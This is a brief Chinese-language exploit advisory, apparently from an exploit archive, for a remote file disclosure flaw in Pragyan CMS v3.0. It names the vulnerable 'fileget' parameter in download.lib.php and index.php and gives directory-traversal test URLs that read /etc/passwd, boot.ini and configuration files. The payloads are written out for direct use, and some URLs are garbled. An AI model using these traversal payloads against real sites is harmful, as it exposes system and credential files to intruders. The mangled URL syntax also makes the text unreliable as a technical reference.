Pragyan CMS v 3.0远程文件泄漏






题目：Pragyan CMS v 3.0 .Remote File Disclosure.

作者 Or4nG.M4n

下载地址 space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMSv3.0beta.tar.bz2



缺点地位

download.lib.php line 16



index.php line 234



$_GET.'fileget'.



测试



www.xxx. /Pragyan/page/ etc/passwd . boot.ini



下载 Config file

exploit /Pragyan/page/

测试



/Pragyan/page/&actionprofile&fileget../../../../../../../../../../../../home/exploitdb/public_html